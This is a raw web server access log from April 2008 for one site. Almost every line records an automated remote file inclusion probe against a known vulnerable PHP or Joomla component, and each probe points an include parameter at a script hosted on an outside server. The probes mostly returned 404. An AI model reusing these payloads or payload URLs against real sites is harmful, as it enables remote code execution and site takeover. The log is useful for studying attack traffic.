189.26.97.122 - - [01/Apr/2008:07:15:44 -0700] "GET /logs/access_080223.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
189.26.97.122 - - [01/Apr/2008:07:15:44 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
165.141.177.14 - - [01/Apr/2008:07:15:45 -0700] "GET //index.php?skin_file=http://www.nameserver11.net/billing2/include/html/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
189.26.97.122 - - [01/Apr/2008:07:15:45 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
165.141.177.14 - - [01/Apr/2008:07:15:47 -0700] "GET /logs//index.php?skin_file=http://www.nameserver11.net/billing2/include/html/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
74.6.17.233 - - [01/Apr/2008:07:15:54 -0700] "GET /logs/access_071116.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
207.7.108.242 - - [01/Apr/2008:07:16:03 -0700] "GET //xoopsgallery/init_basic.php?GALLERY_BASEDIR=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.29.81.87 - - [01/Apr/2008:07:16:06 -0700] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.flirtythirties.com/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.81.87 - - [01/Apr/2008:07:16:06 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.flirtythirties.com/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.216.215.150 - - [01/Apr/2008:07:16:23 -0700] "GET /logs/access_071016.log HTTP/1.1" 200 46965 "-" "-" "www.dmulk.com"
85.159.63.144 - - [01/Apr/2008:07:16:39 -0700] "GET /logs/access_080119.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.ikazlevhalari.com/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.89.31.175 - - [01/Apr/2008:07:16:55 -0700] "GET /logs/access_080215.log/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.geocities.com/bangke77/cmdrfi.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.81.87 - - [01/Apr/2008:07:17:10 -0700] "GET /skins/advanced/advanced1.php?pluginpath[0]=http://www.flirtythirties.com/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
189.26.97.122 - - [01/Apr/2008:07:19:11 -0700] "GET /logs/access_080312.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.29.81.87 - - [01/Apr/2008:07:19:40 -0700] "GET /logs/access_080128.log/skins/advanced/advanced1.php?pluginpath[0]=http://www.flirtythirties.com/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.81.87 - - [01/Apr/2008:07:19:41 -0700] "GET /logs/skins/advanced/advanced1.php?pluginpath[0]=http://www.flirtythirties.com/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.84.7.82 - - [01/Apr/2008:07:19:56 -0700] "GET //skin/zero_vote/error.php?dir=http://acs-fungamer.de/images/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.81.87 - - [01/Apr/2008:07:20:33 -0700] "GET /logs/access_080131.log/skins/advanced/advanced1.php?pluginpath[0]=http://www.flirtythirties.com/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.40.45.130 - - [01/Apr/2008:07:20:42 -0700] "GET /logs/access_080215.log/index.php?redir=http://h1.ripway.com/bhlcrew/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.40.45.130 - - [01/Apr/2008:07:20:42 -0700] "GET /index.php?redir=http://h1.ripway.com/bhlcrew/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.40.45.130 - - [01/Apr/2008:07:20:42 -0700] "GET /logs/index.php?redir=http://h1.ripway.com/bhlcrew/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.17.200.74 - - [01/Apr/2008:07:20:50 -0700] "GET /logs/access_080213.log/index.php?include_location=http://www.health-nutrition-business.com/idforum.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.17.200.74 - - [01/Apr/2008:07:20:50 -0700] "GET /index.php?include_location=http://www.health-nutrition-business.com/idforum.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.17.200.74 - - [01/Apr/2008:07:20:50 -0700] "GET /logs/index.php?include_location=http://www.health-nutrition-business.com/idforum.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.149.36.33 - - [01/Apr/2008:07:21:01 -0700] "GET //include/functions_common.php?gl_root_path=http://www.silak.eu//components/com_rwcard/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.149.36.33 - - [01/Apr/2008:07:21:07 -0700] "GET //include/functions_common.php?gl_root_path=http://www.silak.eu//components/com_rwcard/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.195.52.23 - - [01/Apr/2008:07:21:51 -0700] "GET /plans/?N=A HTTP/1.0" 200 1095 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
85.17.153.107 - - [01/Apr/2008:07:22:49 -0700] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.geocities.com/emptygold/images/header.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.206.242.35 - - [01/Apr/2008:07:22:53 -0700] "GET /logs/access_080225.log/samplefaqsupport.php?path[docroot]=http://www.hamburg-per-soehn-lich.de/.r/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.206.242.35 - - [01/Apr/2008:07:22:53 -0700] "GET /samplefaqsupport.php?path[docroot]=http://www.hamburg-per-soehn-lich.de/.r/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.206.242.35 - - [01/Apr/2008:07:22:54 -0700] "GET /logs/samplefaqsupport.php?path[docroot]=http://www.hamburg-per-soehn-lich.de/.r/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.29.82.80 - - [01/Apr/2008:07:22:55 -0700] "GET /index1.php?pg=http://www.spices.res.in/biotraineeship.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.81.87 - - [01/Apr/2008:07:23:00 -0700] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.flirtythirties.com/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.81.87 - - [01/Apr/2008:07:23:00 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.flirtythirties.com/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.149.36.33 - - [01/Apr/2008:07:23:58 -0700] "GET //include/functions_common.php?gl_root_path=http://www.silak.eu//components/com_rwcard/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.255.250 - - [01/Apr/2008:07:24:12 -0700] "GET //include/functions_common.php?gl_root_path=http://www.simpa.es/includes/data/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.149.36.33 - - [01/Apr/2008:07:24:13 -0700] "GET //include/functions_common.php?gl_root_path=http://www.silak.eu//components/com_rwcard/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.255.250 - - [01/Apr/2008:07:24:15 -0700] "GET //include/functions_common.php?gl_root_path=http://www.simpa.es/includes/data/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.149.36.33 - - [01/Apr/2008:07:24:53 -0700] "GET /logs/access_080215.log//include/functions_common.php?gl_root_path=http://www.silak.eu//components/com_rwcard/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.149.36.33 - - [01/Apr/2008:07:24:54 -0700] "GET /logs//include/functions_common.php?gl_root_path=http://www.silak.eu//components/com_rwcard/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.149.36.33 - - [01/Apr/2008:07:24:54 -0700] "GET /logs/access_080125.log//include/functions_common.php?gl_root_path=http://www.silak.eu//components/com_rwcard/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.149.36.33 - - [01/Apr/2008:07:24:55 -0700] "GET /logs/access_080215.log//include/functions_common.php?gl_root_path=http://www.silak.eu//components/com_rwcard/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.149.36.33 - - [01/Apr/2008:07:24:55 -0700] "GET /logs//include/functions_common.php?gl_root_path=http://www.silak.eu//components/com_rwcard/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.149.36.33 - - [01/Apr/2008:07:24:55 -0700] "GET /logs/access_080125.log//include/functions_common.php?gl_root_path=http://www.silak.eu//components/com_rwcard/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.255.250 - - [01/Apr/2008:07:25:49 -0700] "GET //include/functions_common.php?gl_root_path=http://www.simpa.es/includes/data/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.255.250 - - [01/Apr/2008:07:25:49 -0700] "GET //include/functions_common.php?gl_root_path=http://www.simpa.es/includes/data/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.81.87 - - [01/Apr/2008:07:26:00 -0700] "GET /logs/access_080112.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.flirtythirties.com/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.67.26.84 - - [01/Apr/2008:07:26:03 -0700] "GET /logs/access_080313.log/modulescjaycontentadmineditor2spaw_control.class.php?spaw_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
220.135.204.131 - - [01/Apr/2008:07:26:22 -0700] "GET /logs/access_080118.log//modules/xfsection/modify.php?dir_module=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.63.3.45 - - [01/Apr/2008:07:26:23 -0700] "GET /logs/access_080125.log//claroline/phpbb/page_tail.php?includePath=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
220.135.204.131 - - [01/Apr/2008:07:26:23 -0700] "GET //modules/xfsection/modify.php?dir_module=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.63.3.45 - - [01/Apr/2008:07:26:24 -0700] "GET //claroline/phpbb/page_tail.php?includePath=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.63.3.45 - - [01/Apr/2008:07:26:24 -0700] "GET /logs//claroline/phpbb/page_tail.php?includePath=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
220.135.204.131 - - [01/Apr/2008:07:26:25 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
220.135.204.131 - - [01/Apr/2008:07:26:35 -0700] "GET /logs/access.log//modules/xfsection/modify.php?dir_module=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.18.207.65 - - [01/Apr/2008:07:26:42 -0700] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.atlant.ru/sms/img/images.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.18.207.65 - - [01/Apr/2008:07:26:43 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.atlant.ru/sms/img/images.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.40.45.130 - - [01/Apr/2008:07:26:54 -0700] "GET /logs/access_080312.log/index.php?redir=http://h1.ripway.com/bhlcrew/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.159.63.144 - - [01/Apr/2008:07:26:58 -0700] "GET //components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.ikazlevhalari.com/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.206.242.35 - - [01/Apr/2008:07:27:11 -0700] "GET /logs/access_080215.log/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.hamburg-per-soehn-lich.de/.r/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.206.242.35 - - [01/Apr/2008:07:27:12 -0700] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.hamburg-per-soehn-lich.de/.r/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.206.242.35 - - [01/Apr/2008:07:27:12 -0700] "GET /logs/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.hamburg-per-soehn-lich.de/.r/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.206.242.35 - - [01/Apr/2008:07:27:17 -0700] "GET /logs/access_080305.log/class/class.dashboard_cms.php?where_framework=http://www.hamburg-per-soehn-lich.de/.r/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.206.242.35 - - [01/Apr/2008:07:27:18 -0700] "GET /class/class.dashboard_cms.php?where_framework=http://www.hamburg-per-soehn-lich.de/.r/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.206.242.35 - - [01/Apr/2008:07:27:18 -0700] "GET /logs/class/class.dashboard_cms.php?where_framework=http://www.hamburg-per-soehn-lich.de/.r/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.44.244.77 - - [01/Apr/2008:07:27:30 -0700] "GET /logs/access_080215.log/main.php?inc=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.44.244.77 - - [01/Apr/2008:07:27:36 -0700] "GET /main.php?inc=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.44.244.77 - - [01/Apr/2008:07:27:37 -0700] "GET /logs/main.php?inc=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.206.242.35 - - [01/Apr/2008:07:27:45 -0700] "GET /logs/access.log/samplefaqsupport.php?path[docroot]=http://www.hamburg-per-soehn-lich.de/.r/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.93.255.250 - - [01/Apr/2008:07:27:45 -0700] "GET /logs/access_080215.log//include/functions_common.php?gl_root_path=http://www.simpa.es/includes/data/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.255.250 - - [01/Apr/2008:07:27:45 -0700] "GET /logs//include/functions_common.php?gl_root_path=http://www.simpa.es/includes/data/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.255.250 - - [01/Apr/2008:07:27:46 -0700] "GET /logs/access_080215.log//include/functions_common.php?gl_root_path=http://www.simpa.es/includes/data/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.255.250 - - [01/Apr/2008:07:27:46 -0700] "GET /logs//include/functions_common.php?gl_root_path=http://www.simpa.es/includes/data/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.255.250 - - [01/Apr/2008:07:27:49 -0700] "GET /logs/access_080125.log//include/functions_common.php?gl_root_path=http://www.simpa.es/includes/data/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.255.250 - - [01/Apr/2008:07:27:50 -0700] "GET /logs/access_080125.log//include/functions_common.php?gl_root_path=http://www.simpa.es/includes/data/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
218.234.21.89 - - [01/Apr/2008:07:27:54 -0700] "GET /logs/access_080225.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.tecnicsuport.com/dades/gestiobanners/special.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.18.207.65 - - [01/Apr/2008:07:28:05 -0700] "GET /logs/access_080113.log//components/com_flyspray/startdown.php?file=http://www.atlant.ru/sms/img/images.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.18.207.65 - - [01/Apr/2008:07:28:05 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://www.atlant.ru/sms/img/images.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.85.12.121 - - [01/Apr/2008:07:28:10 -0700] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://isnova.madeiratecnopolo.pt/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
212.85.12.121 - - [01/Apr/2008:07:28:15 -0700] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://isnova.madeiratecnopolo.pt/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
84.18.207.65 - - [01/Apr/2008:07:28:24 -0700] "GET /logs/access_080228.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.atlant.ru/sms/img/images.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.118.25.104 - - [01/Apr/2008:07:28:55 -0700] "GET //include/functions_common.php?gl_root_path=http://www.simpa.es/includes/data/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.160.78.135 - - [01/Apr/2008:07:29:18 -0700] "GET /logs/access_080131.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.mittweida.biz/images/.../id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.160.78.135 - - [01/Apr/2008:07:29:19 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.mittweida.biz/images/.../id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.160.78.135 - - [01/Apr/2008:07:29:19 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.mittweida.biz/images/.../id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
61.63.3.45 - - [01/Apr/2008:07:29:31 -0700] "GET /logs/access_080201.log//claroline/phpbb/page_tail.php?includePath=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.18.207.65 - - [01/Apr/2008:07:29:36 -0700] "GET /logs/access_080218.log//include/functions_common.php?gl_root_path=http://www.atlant.ru/sms/img/images.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.18.207.65 - - [01/Apr/2008:07:29:37 -0700] "GET /logs//include/functions_common.php?gl_root_path=http://www.atlant.ru/sms/img/images.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.239.177.121 - - [01/Apr/2008:07:29:48 -0700] "GET /logs/access_080305.log//admin/classes/TplLoad.php?full_path_to_public_program=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.239.177.121 - - [01/Apr/2008:07:29:48 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.239.177.121 - - [01/Apr/2008:07:29:49 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.148.95.154 - - [01/Apr/2008:07:29:49 -0700] "GET /logs/access_080305.log//admin/classes/TplLoad.php?full_path_to_public_program=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.148.95.154 - - [01/Apr/2008:07:29:49 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.148.95.154 - - [01/Apr/2008:07:29:50 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
200.234.200.140 - - [01/Apr/2008:07:29:50 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.kttcrew.com/1234.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.160.78.135 - - [01/Apr/2008:07:30:21 -0700] "GET /logs/access_080131.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://radioidea.pl/panel/MUZ/us.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.160.78.135 - - [01/Apr/2008:07:30:21 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://radioidea.pl/panel/MUZ/us.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.160.78.135 - - [01/Apr/2008:07:30:22 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://radioidea.pl/panel/MUZ/us.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.160.78.135 - - [01/Apr/2008:07:31:11 -0700] "GET /logs/access_080118.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.mittweida.biz/images/.../id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
194.206.242.35 - - [01/Apr/2008:07:31:14 -0700] "GET /logs/access_080126.log/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.hamburg-per-soehn-lich.de/.r/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.234.21.89 - - [01/Apr/2008:07:31:19 -0700] "GET /logs/access_080223.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.tecnicsuport.com/dades/gestiobanners/special.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.84.7.82 - - [01/Apr/2008:07:31:34 -0700] "GET /logs/access_080207.log//components/com_simpleboard/image_upload.php?sbp=http://spark-rookies.de/tmp/can.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.84.7.82 - - [01/Apr/2008:07:31:34 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://spark-rookies.de/tmp/can.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.84.7.82 - - [01/Apr/2008:07:31:34 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://spark-rookies.de/tmp/can.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.160.78.135 - - [01/Apr/2008:07:31:55 -0700] "GET /logs/access_080118.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://radioidea.pl/panel/MUZ/us.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
75.118.25.104 - - [01/Apr/2008:07:31:59 -0700] "GET //include/functions_common.php?gl_root_path=http://www.simpa.es/includes/data/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.239.177.121 - - [01/Apr/2008:07:32:20 -0700] "GET /logs/access_080306.log//admin/classes/TplLoad.php?full_path_to_public_program=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.81.87 - - [01/Apr/2008:07:32:28 -0700] "GET /logs/access_080112.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.flirtythirties.com/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.118.25.104 - - [01/Apr/2008:07:32:37 -0700] "GET /logs/access_080215.log//include/functions_common.php?gl_root_path=http://www.simpa.es/includes/data/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.118.25.104 - - [01/Apr/2008:07:32:37 -0700] "GET /logs//include/functions_common.php?gl_root_path=http://www.simpa.es/includes/data/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
125.24.102.112 - - [01/Apr/2008:07:32:42 -0700] "GET /logs/access_080124.log HTTP/1.1" 200 262144 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
75.118.25.104 - - [01/Apr/2008:07:32:42 -0700] "GET /logs/access_080125.log//include/functions_common.php?gl_root_path=http://www.simpa.es/includes/data/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.79.239.236 - - [01/Apr/2008:07:32:53 -0700] "GET /start.php?id=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
208.79.239.236 - - [01/Apr/2008:07:32:54 -0700] "GET /logs/start.php?id=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
217.16.16.208 - - [01/Apr/2008:07:32:56 -0700] "GET /logs/access_080305.log//admin/classes/TplLoad.php?full_path_to_public_program=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.16.16.208 - - [01/Apr/2008:07:32:57 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.16.16.208 - - [01/Apr/2008:07:32:57 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.16.16.208 - - [01/Apr/2008:07:32:59 -0700] "GET /logs/access_080305.log//admin/classes/TplLoad.php?full_path_to_public_program=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.16.16.208 - - [01/Apr/2008:07:32:59 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
